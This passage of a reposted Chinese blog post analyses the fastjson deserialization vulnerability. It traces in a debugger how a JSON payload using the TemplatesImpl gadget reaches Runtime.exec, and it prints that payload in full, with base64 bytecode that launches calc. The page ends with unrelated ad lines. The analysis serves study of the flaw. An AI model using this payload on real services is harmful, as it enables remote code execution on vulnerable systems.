        System.out.println(text1);
        //String personStr = "{'name':"+text1+",'age':19}";
        //Person obj = JSON.parseObject(personStr, Person.class, config, Feature.SupportNonPublicField);
        Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField); //pareseObject來反序列化,此時要設置SupportNonPublicField

public static void main(String args[]){ try { test_autoTypeDeny(); } catch (Exception e) { e.printStackTrace(); } } }

 我們已經知道在反序列化解析json字符串時在parseobject時觸發

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADEALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQANTHBlcnNvbi9UZXN0OwEACkV4Y2VwdGlvbnMHACUBAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHACYBAApTb3VyY2VGaWxlAQAJVGVzdC5qYXZhDAAHAAgHACcMACgAKQEABGNhbGMMACoAKwEAC3BlcnNvbi9UZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgAKAAAADgADAAAADwAEABAADQARAAsAAAAMAAEAAAAOAAwADQAAAA4AAAAEAAEADwABABAAEQABAAkAAABJAAAABAAAAAGxAAAAAgAKAAAABgABAAAAFQALAAAAKgAEAAAAAQAMAA0AAAAAAAEAEgATAAEAAAABABQAFQACAAAAAQAWABcAAwABABAAGAACAAkAAAA/AAAAAwAAAAGxAAAAAgAKAAAABgABAAAAGgALAAAAIAADAAAAAQAMAA0AAAAAAAEAEgATAAEAAAABABkAGgACAA4AAAAEAAEAGwABABwAAAACAB0="],'_name':'a.b','_tfactory':{ },"_outputProperties":{ }}

 在此下斷點,運行poc.java

此時首先調用com/alibaba/fastjson/JSON.java的parseObject函數來處理我們傳入的payload

 此時判斷我們傳入的features是否為null,這裏

我們已經制定了支持非publicfield屬性,因為使用的_bytescode實際為非public的,否則無法反序列化,接着調用defaultJsonParser來進一步處理payload

 此時進一步調用javaObjectDeserializer,也就是反序列化時所使用的反序列化引擎,繼續跟進

 此時在javaObjectDeserializer的deserialze函數中將判斷type的類型是不是泛型數組類型的實例以及判斷type是不是類類型的實例,這裏兩處不滿足,所以調用parse.parse來解析

實際上此時又回到了

並且在此調用parseObject函數來處理我們的payload

接下來一部分就是語法解析,先匹配出了其中的雙引號”,

 比如先在parseObject函數中匹配出了@type

 匹配出@type標誌以後,將會繼續向後掃描json字符串,即取匹配相應的值,這個值也就是我們想要反序列化的類

 繼續往下走,將調用deserializer.deserialze函數來處理反序列化數據,此時deserializer中已經包含了要實例化的templatesimpl類,

跟進此函數,則可以看到此時token為16並且text為我們的payload

 接下來會調用parseField函數來對json字符串中的一些key值進行匹配

 這個方法裏面會調用smartmatch來對key值進行一些處理,比如將_bytecodes的下劃線刪除

 當處理到_outputProperties字段時,步入其smartMatch方法

 此時在FieldDeserializer中將會調用setValue方,此時將會在其中調用getOutputProperties()方法,因為存在OutputProperties屬性

 

 此時在TemplatesImpl類的getOutputProperties函數中將會調用newTransformer().getOutputProperties函數,在newTransformer函數中又調用了getTransletInstance()函數,

 

 這裏首先判斷_name字段不能為空,這也是為啥payload裏面會設置一個_name字段

 接下來就會調用newInstance()函數來實例化對象了,可以看到此事要求實例化的對象時AbstractTranslet類的,那麼只需要讓我們的payload中的類繼承自該類即可, 

可以看到此時_transletIndex為零,因此此時實例化的就是我們構造的惡意類,

 

縮減后的整個調用鏈即為:

JSON.parseObject
...
JavaBeanDeserializer.deserialze
...
FieldDeserializer.setValue
...
TemplatesImpl.getOutputProperties
TemplatesImpl.newTransformer
TemplatesImpl.getTransletInstance
...
Runtime.getRuntime().exec

參考:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理【其他文章推薦】

USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※評比前十大台北網頁設計台北網站設計公司知名案例作品心得分享

※智慧手機時代的來臨,RWD網頁設計已成為網頁設計推薦首選